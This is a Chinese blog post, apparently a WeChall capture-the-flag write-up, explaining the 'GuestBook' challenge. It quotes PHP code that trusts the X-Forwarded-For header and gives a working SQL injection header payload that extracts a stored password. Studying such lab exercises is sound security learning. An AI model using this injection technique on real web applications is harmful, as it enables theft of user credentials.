心 空

  • Tools
Ricky Hao
  1. 首页
  2. WeChall
  3. 正文

WeChall 之 GuestBook

29 1 月, 2016 3578点热度 1人点赞 0条评论

这题是个SQL注入。
看到

$message = mysql_real_escape_string($message);

这句话,就知道message这个点是注入不了的。
那么只能从其他地方注入。
研究这句话:

$query = "INSERT INTO gbook_book VALUES('$playerid', $userid, $time, '$ip', '$message')";

它只对message有过滤处理,而对其他的变量并没有过滤。
同时看上文的

function gbook_getIP()
{
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    elseif (isset($_SERVER['HTTP_VIA'])) { 
        return $_SERVER['HTTP_VIA'];
    }
    else {
        return $_SERVER['REMOTE_ADDR'];
    }
}

函数,发现这里是通过XFF来得到的客户端IP,同时XFF没有被过滤。
那么我们就可以通过构造XFF字段来注入:

X-Forwarded-For:',(select gbu_password from gbook_user limit 1))#
本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
标签: wechall
最后更新:29 1 月, 2016

Ricky

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

这个站点使用 Akismet 来减少垃圾评论。了解你的评论数据如何被处理。

COPYRIGHT © 2025 心 空. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang